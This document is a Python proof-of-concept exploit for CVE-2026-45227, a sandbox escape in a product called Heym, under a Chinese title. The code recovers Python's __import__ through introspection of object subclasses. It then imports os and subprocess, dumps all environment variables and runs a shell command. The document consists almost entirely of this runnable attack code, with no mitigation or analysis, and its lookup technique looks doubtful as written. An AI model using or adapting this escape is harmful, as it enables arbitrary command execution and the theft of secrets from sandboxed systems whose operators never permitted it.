CVE-2026-45227 Heym沙箱逃逸漏洞

# PoC for CVE-2026-45227: Heym Sandbox Escape # This demonstrates recovering __import__ via introspection to execute commands def sandbox_escape(): # Start with a base object like a tuple or list base = ().__class__.__bases__[0] # Iterate through subclasses to find a reference to __import__ for cls in base.__subclasses__(): try: # Check if '__import__' is in the class dictionary or accessible if "__import__" in cls.__dict__: # Recover the unrestricted __import__ function import_func = cls.__dict__["__import__"] # Import blocked modules (e.g., os, subprocess) os_mod = import_func("os") subprocess_mod = import_func("subprocess") # Access sensitive environment variables print("[+] Leaked Environment Variables:") for k, v in os_mod.environ.items(): print(f"{k}: {v}") # Execute arbitrary command result = subprocess_mod.check_output("id", shell=True) print(f"[+] Executed Command Output: {result.decode()}") return True except Exception: continue return False if __name__ == "__main__": sandbox_escape()